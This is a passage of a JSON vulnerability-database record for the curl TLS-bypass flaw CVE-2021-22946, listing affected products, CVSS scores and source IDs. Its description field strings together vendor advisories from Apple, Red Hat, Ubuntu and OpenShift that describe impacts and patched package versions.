"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.0"
},
{
"_id": null,
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.8.0"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.3"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "gte",
"trust": 1.0,
"vendor": "haxx",
"version": "7.20.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "snapcenter",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.11.0"
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.79.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.35"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.1"
},
{
"_id": null,
"model": "commerce guided search",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.3.2"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22946"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166112"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "164993"
}
],
"trust": 0.4
},
"cve": "CVE-2021-22946",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-22946",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-381420",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2021-22946",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-22946",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202109-997",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-381420",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381420"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
},
{
"db": "NVD",
"id": "CVE-2021-22946"
}
]
},
"description": {
"_id": null,
"data": "A user can tell curl \u003e= 7.20.0 and \u003c= 7.78.0 to require a successful upgrade to TLS when speaking to an IMAP, POP3 or FTP server (`--ssl-reqd` on the command line or `CURLOPT_USE_SSL` set to `CURLUSESSL_CONTROL` or `CURLUSESSL_ALL` with libcurl). This requirement could be bypassed if the server would return a properly crafted but perfectly legitimate response. This flaw would then make curl silently continue its operations **without TLS** contrary to the instructions and expectations, exposing possibly sensitive data in clear text over the network. A security issue was found in curl prior to 7.79.0. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2022-03-14-4 macOS Monterey 12.3\n\nmacOS Monterey 12.3 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213183. \n\nAccelerate Framework\nAvailable for: macOS Monterey\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2022-22633: an anonymous researcher\n\nAMD\nAvailable for: macOS Monterey\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-22669: an anonymous researcher\n\nAppKit\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to gain root privileges\nDescription: A logic issue was addressed with improved validation. \nCVE-2022-22665: Lockheed Martin Red Team\n\nAppleGraphicsControl\nAvailable for: macOS Monterey\nImpact: An application may be able to gain elevated privileges\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. 
\nCVE-2022-22631: an anonymous researcher\n\nAppleScript\nAvailable for: macOS Monterey\nImpact: Processing a maliciously crafted AppleScript binary may\nresult in unexpected application termination or disclosure of process\nmemory\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro\n\nAppleScript\nAvailable for: macOS Monterey\nImpact: An application may be able to read restricted memory\nDescription: This issue was addressed with improved checks. \nCVE-2022-22648: an anonymous researcher\n\nAppleScript\nAvailable for: macOS Monterey\nImpact: Processing a maliciously crafted AppleScript binary may\nresult in unexpected application termination or disclosure of process\nmemory\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro\nCVE-2022-22627: Qi Sun and Robert Ai of Trend Micro\n\nAppleScript\nAvailable for: macOS Monterey\nImpact: Processing a maliciously crafted file may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2022-22597: Qi Sun and Robert Ai of Trend Micro\n\nBOM\nAvailable for: macOS Monterey\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper\nchecks\nDescription: This issue was addressed with improved checks. \nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley\n(@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\ncurl\nAvailable for: macOS Monterey\nImpact: Multiple issues in curl\nDescription: Multiple issues were addressed by updating to curl\nversion 7.79.1. \nCVE-2021-22946\nCVE-2021-22947\nCVE-2021-22945\nCVE-2022-22623\n\nFaceTime\nAvailable for: macOS Monterey\nImpact: A user may send audio and video in a FaceTime call without\nknowing that they have done so\nDescription: This issue was addressed with improved checks. 
\nCVE-2022-22643: Sonali Luthar of the University of Virginia, Michael\nLiao of the University of Illinois at Urbana-Champaign, Rohan Pahwa\nof Rutgers University, and Bao Nguyen of the University of Florida\n\nImageIO\nAvailable for: macOS Monterey\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2022-22611: Xingyu Jin of Google\n\nImageIO\nAvailable for: macOS Monterey\nImpact: Processing a maliciously crafted image may lead to heap\ncorruption\nDescription: A memory consumption issue was addressed with improved\nmemory handling. \nCVE-2022-22612: Xingyu Jin of Google\n\nIntel Graphics Driver\nAvailable for: macOS Monterey\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A type confusion issue was addressed with improved state\nhandling. \nCVE-2022-22661: an anonymous researcher, Peterpan0927 of Alibaba\nSecurity Pandora Lab\n\nIOGPUFamily\nAvailable for: macOS Monterey\nImpact: An application may be able to gain elevated privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-22641: Mohamed Ghannam (@_simo36)\n\nKernel\nAvailable for: macOS Monterey\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2022-22613: Alex, an anonymous researcher\n\nKernel\nAvailable for: macOS Monterey\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-22614: an anonymous researcher\nCVE-2022-22615: an anonymous researcher\n\nKernel\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to elevate privileges\nDescription: A logic issue was addressed with improved state\nmanagement. 
\nCVE-2022-22632: Keegan Saunders\n\nKernel\nAvailable for: macOS Monterey\nImpact: An attacker in a privileged position may be able to perform a\ndenial of service attack\nDescription: A null pointer dereference was addressed with improved\nvalidation. \nCVE-2022-22638: derrek (@derrekr6)\n\nKernel\nAvailable for: macOS Monterey\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2022-22640: sqrtpwn\n\nlibarchive\nAvailable for: macOS Monterey\nImpact: Multiple issues in libarchive\nDescription: Multiple memory corruption issues existed in libarchive. \nThese issues were addressed with improved input validation. \nCVE-2021-36976\n\nLogin Window\nAvailable for: macOS Monterey\nImpact: A person with access to a Mac may be able to bypass Login\nWindow\nDescription: This issue was addressed with improved checks. \nCVE-2022-22647: an anonymous researcher\n\nLoginWindow\nAvailable for: macOS Monterey\nImpact: A local attacker may be able to view the previous logged in\nuser\u2019s desktop from the fast user switching screen\nDescription: An authentication issue was addressed with improved\nstate management. \nCVE-2022-22656\n\nGarageBand MIDI\nAvailable for: macOS Monterey\nImpact: Opening a maliciously crafted file may lead to unexpected\napplication termination or arbitrary code execution\nDescription: A memory initialization issue was addressed with\nimproved memory handling. \nCVE-2022-22657: Brandon Perry of Atredis Partners\n\nGarageBand MIDI\nAvailable for: macOS Monterey\nImpact: Opening a maliciously crafted file may lead to unexpected\napplication termination or arbitrary code execution\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. 
\nCVE-2022-22664: Brandon Perry of Atredis Partners\n\nNSSpellChecker\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to access information\nabout a user\u0027s contacts\nDescription: A privacy issue existed in the handling of Contact\ncards. This was addressed with improved state management. \nCVE-2022-22644: an anonymous researcher\n\nPackageKit\nAvailable for: macOS Monterey\nImpact: An application may be able to gain elevated privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2022-22617: Mickey Jin (@patch1t)\n\nPreferences\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to read other\napplications\u0027 settings\nDescription: The issue was addressed with additional permissions\nchecks. \nCVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nQuickTime Player\nAvailable for: macOS Monterey\nImpact: A plug-in may be able to inherit the application\u0027s\npermissions and access user data\nDescription: This issue was addressed with improved checks. \nCVE-2022-22650: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nSafari Downloads\nAvailable for: macOS Monterey\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper\nchecks\nDescription: This issue was addressed with improved checks. \nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley\n(@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\nSandbox\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to bypass certain Privacy\npreferences\nDescription: The issue was addressed with improved permissions logic. 
\nCVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited,\nKhiem Tran\n\nSiri\nAvailable for: macOS Monterey\nImpact: A person with physical access to a device may be able to use\nSiri to obtain some location information from the lock screen\nDescription: A permissions issue was addressed with improved\nvalidation. \nCVE-2022-22599: Andrew Goldberg of the University of Texas at Austin,\nMcCombs School of Business (linkedin.com/andrew-goldberg/)\n\nSMB\nAvailable for: macOS Monterey\nImpact: A remote attacker may be able to cause unexpected system\ntermination or corrupt kernel memory\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2022-22651: Felix Poulin-Belanger\n\nSoftwareUpdate\nAvailable for: macOS Monterey\nImpact: An application may be able to gain elevated privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2022-22639: Mickey Jin (@patch1t)\n\nSystem Preferences\nAvailable for: macOS Monterey\nImpact: An app may be able to spoof system notifications and UI\nDescription: This issue was addressed with a new entitlement. \nCVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)\n\nUIKit\nAvailable for: macOS Monterey\nImpact: A person with physical access to an iOS device may be able to\nsee sensitive information via keyboard suggestions\nDescription: This issue was addressed with improved checks. \nCVE-2022-22621: Joey Hewitt\n\nVim\nAvailable for: macOS Monterey\nImpact: Multiple issues in Vim\nDescription: Multiple issues were addressed by updating Vim. \nCVE-2021-4136\nCVE-2021-4166\nCVE-2021-4173\nCVE-2021-4187\nCVE-2021-4192\nCVE-2021-4193\nCVE-2021-46059\nCVE-2022-0128\nCVE-2022-0156\nCVE-2022-0158\n\nVoiceOver\nAvailable for: macOS Monterey\nImpact: A user may be able to view restricted content from the lock\nscreen\nDescription: A lock screen issue was addressed with improved state\nmanagement. 
\nCVE-2021-30918: an anonymous researcher\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may disclose\nsensitive user information\nDescription: A cookie management issue was addressed with improved\nstate management. \nWebKit Bugzilla: 232748\nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may lead to code\nexecution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nWebKit Bugzilla: 232812\nCVE-2022-22610: Quan Yin of Bigo Technology Live Client Team\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nWebKit Bugzilla: 233172\nCVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\nWebKit Bugzilla: 234147\nCVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A buffer overflow issue was addressed with improved\nmemory handling. \nWebKit Bugzilla: 234966\nCVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro\nZero Day Initiative\n\nWebKit\nAvailable for: macOS Monterey\nImpact: A malicious website may cause unexpected cross-origin\nbehavior\nDescription: A logic issue was addressed with improved state\nmanagement. \nWebKit Bugzilla: 235294\nCVE-2022-22637: Tom McKee of Google\n\nWi-Fi\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to leak sensitive user\ninformation\nDescription: A logic issue was addressed with improved restrictions. \nCVE-2022-22668: MrPhil17\n\nxar\nAvailable for: macOS Monterey\nImpact: A local user may be able to write arbitrary files\nDescription: A validation issue existed in the handling of symlinks. 
\nThis issue was addressed with improved validation of symlinks. \nCVE-2022-22582: Richard Warren of NCC Group\n\nAdditional recognition\n\nAirDrop\nWe would like to acknowledge Omar Espino (omespino.com), Ron Masas of\nBreakPoint.sh for their assistance. \n\nBluetooth\nWe would like to acknowledge an anonymous researcher, chenyuwang\n(@mzzzz__) of Tencent Security Xuanwu Lab for their assistance. \n\nFace Gallery\nWe would like to acknowledge Tian Zhang (@KhaosT) for their\nassistance. \n\nIntel Graphics Driver\nWe would like to acknowledge Jack Dates of RET2 Systems, Inc., Yinyi\nWu (@3ndy1) for their assistance. \n\nLocal Authentication\nWe would like to acknowledge an anonymous researcher for their\nassistance. \n\nNotes\nWe would like to acknowledge Nathaniel Ekoniak of Ennate Technologies\nfor their assistance. \n\nPassword Manager\nWe would like to acknowledge Maximilian Golla (@m33x) of Max Planck\nInstitute for Security and Privacy (MPI-SP) for their assistance. \n\nSiri\nWe would like to acknowledge an anonymous researcher for their\nassistance. \n\nsyslog\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for\ntheir assistance. \n\nTCC\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive\nSecurity for their assistance. \n\nUIKit\nWe would like to acknowledge Tim Shadel of Day Logger, Inc. for their\nassistance. \n\nWebKit\nWe would like to acknowledge Abdullah Md Shaleh for their assistance. \n\nWebKit Storage\nWe would like to acknowledge Martin Bajanik of FingerprintJS for\ntheir assistance. \n\nmacOS Monterey 12.3 may be obtained from the Mac App Store or Apple\u0027s\nSoftware Downloads web site: https://support.apple.com/downloads/\nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. 
\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmIv0O4ACgkQeC9qKD1p\nrhjGGRAAjqIyEzN+LAk+2uzHIMQNEwav9fqo/ZNoYAOzNgActK56PIC/PBM3SzHd\nLrGFKbBq/EMU4EqXT6ycB7/uZfaAZVCBDNo1qOoYNHXnKtGL2Z/96mV14qbSmRvC\njfg1pC0G1jPTxJKvHhuQSZHDGj+BI458fwuTY48kjCnzlWf9dKr2kdjUjE38X9RM\n0upKVKqY+oWdbn5jPwgZ408NOqzHrHDW1iIYd4v9UrKN3pfMGDzVZTr/offL6VFL\nosOVWv1IZvXrhPsrtd2KfG0hTHz71vShVZ7jGAsGEdC/mT79zwFbYuzBFy791xFa\nrizr/ZWGfWBSYy8O90d1l13lDlE739YPc/dt1mjcvP9FTnzMwBagy+6//zAVe0v/\nKZOjmvtK5sRvrQH54E8qTYitdMpY2aZhfT6D8tcl+98TjxTDNXXj/gypdCXNWqyB\nL1PtFhTjQ0WnzUNB7sosM0zAjfZ1iPAZq0XHDQ6p6gEdVavNOHo/ekgibVm5f1pi\nkwBHkKyq55QbzipDWwXl6Owk/iaHPxgENYb78BpeUQSFei+IYDUsyLkPh3L95PHZ\nJSyKOtbBArlYOWcxlYHn+hDK8iotA1c/SHDefYOoNkp1uP853Ge09eWq+zMzUwEo\nGXXJYMi1Q8gmJ9wK/A3d/FKY4FBZxpByUUgjYhiMKTU5cSeihaI=\n=RiA+\n-----END PGP SIGNATURE-----\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: curl security update\nAdvisory ID: RHSA-2022:0635-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:0635\nIssue date: 2022-02-22\nCVE Names: CVE-2021-22946 CVE-2021-22947 \n=====================================================================\n\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 8.2\nExtended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64\n\n3. 
Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: Requirement to use TLS not properly enforced for IMAP, POP3, and\nFTP protocols (CVE-2021-22946)\n\n* curl: Server responses received before STARTTLS processed after TLS\nhandshake (CVE-2021-22947)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux BaseOS EUS (v. 8.2):\n\nSource:\ncurl-7.61.1-12.el8_2.4.src.rpm\n\naarch64:\ncurl-7.61.1-12.el8_2.4.aarch64.rpm\ncurl-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm\ncurl-debugsource-7.61.1-12.el8_2.4.aarch64.rpm\ncurl-minimal-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm\nlibcurl-7.61.1-12.el8_2.4.aarch64.rpm\nlibcurl-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm\nlibcurl-devel-7.61.1-12.el8_2.4.aarch64.rpm\nlibcurl-minimal-7.61.1-12.el8_2.4.aarch64.rpm\nlibcurl-minimal-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm\n\nppc64le:\ncurl-7.61.1-12.el8_2.4.ppc64le.rpm\ncurl-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm\ncurl-debugsource-7.61.1-12.el8_2.4.ppc64le.rpm\ncurl-minimal-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm\nlibcurl-7.61.1-12.el8_2.4.ppc64le.rpm\nlibcurl-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm\nlibcurl-devel-7.61.1-12.el8_2.4.ppc64le.rpm\nlibcurl-minimal-7.61.1-12.el8_2.4.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm\n\ns390x:\ncurl-7.61.1-12.el8_2.4.s390x.rpm\ncurl-debuginfo-7.61.1-12.el8_2.4.s390x.rpm\ncurl-debugsource-7.61.1-12.el8_2.4.s390x.rpm\ncurl-minimal-debuginfo-7.61.1-12.el8_2.4.s390x.rpm\nlibcurl-7.61.1-12.el8_2.4.s390x.rpm\nlibcurl-debuginfo-7.61.1-12.el8_2.4.s390x.rpm\nlibcurl-devel-7.61.1-12.el8_2.4.s390x.rpm\nlibcurl-minimal-7.61.1-12.el8_2.4.s390x.rpm\nlibcurl-minimal-debuginfo-7.61.1-12.el8_2.4.s390x.rpm\n\nx86_64:\ncurl-7.61.1-12.el8_2.4.x86_64.rpm\ncurl-debuginfo-7.61.1-12.el8_2.4.i686.rpm\ncurl-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm\ncurl-debugsource-7.61.1-12.el8_2.4.i686.rpm\ncurl-debugsource-7.61.1-12.el8_2.4.x86_64.rpm\ncurl-minimal-debuginfo-7.61.1-12.el8_2.4.i686.rpm\ncurl-minimal-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm\nlibcurl-7.61.1-12.el8_2.4.i686.rpm\nlibcurl-7.61.1-12.el8_2.4.x86_64.rpm\nlibcurl-debuginfo-7.61.1-12.el8_2.4.i686.rpm\nlibcurl-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm\nlibcurl-devel-7.61.1-12.el8_2.4.i686.rpm\nlibcurl-devel-7.61.1-12.el8_2.4.x86_64.rpm\nlibcurl-minimal-7.61.1-12.el8_2.4.i686.rpm\nlibcurl-minimal-7.61.1-12.el8_2.4.x86_64.rpm\nlibcurl-minimal-debuginfo-7.61.1-12.el8_2.4.i686.rpm\nlibcurl-minimal-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-22946\nhttps://access.redhat.com/security/cve/CVE-2021-22947\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. ==========================================================================\nUbuntu Security Notice USN-5079-3\nSeptember 21, 2021\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 18.04 LTS\n\nSummary:\n\nUSN-5079-1 introduced a regression in curl. One of the fixes introduced a\nregression on Ubuntu 18.04 LTS. This update fixes the problem. 
\n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n It was discovered that curl incorrect handled memory when sending data to\n an MQTT server. A remote attacker could use this issue to cause curl to\n crash, resulting in a denial of service, or possibly execute arbitrary\n code. (CVE-2021-22945)\n Patrick Monnerat discovered that curl incorrectly handled upgrades to TLS. (CVE-2021-22946)\n Patrick Monnerat discovered that curl incorrectly handled responses\n received before STARTTLS. A remote attacker could possibly use this issue\n to inject responses and intercept communications. (CVE-2021-22947)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.04 LTS:\n curl 7.58.0-2ubuntu3.16\n libcurl3-gnutls 7.58.0-2ubuntu3.16\n libcurl3-nss 7.58.0-2ubuntu3.16\n libcurl4 7.58.0-2ubuntu3.16\n\nIn general, a standard system update will make all the necessary changes. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution\n2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport)\n2006842 - MigCluster CR remains in \"unready\" state and source registry is inaccessible after temporary shutdown of source cluster\n2007429 - \"oc describe\" and \"oc log\" commands on \"Migration resources\" tree cannot be copied after failed migration\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n\n5. 
Solution:\n\nFor OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option\n1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1858 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1917 - [release-5.1] Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\n\n6",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22946"
},
{
"db": "VULHUB",
"id": "VHN-381420"
},
{
"db": "VULMON",
"id": "CVE-2021-22946"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166319"
},
{
"db": "PACKETSTORM",
"id": "166112"
},
{
"db": "PACKETSTORM",
"id": "164220"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "164993"
}
],
"trust": 1.62
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-22946",
"trust": 2.4
},
{
"db": "SIEMENS",
"id": "SSA-389290",
"trust": 1.7
},
{
"db": "HACKERONE",
"id": "1334111",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164993",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165099",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166319",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166112",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165053",
"trust": 0.7
},
{
"db": "PACKETSTORM",
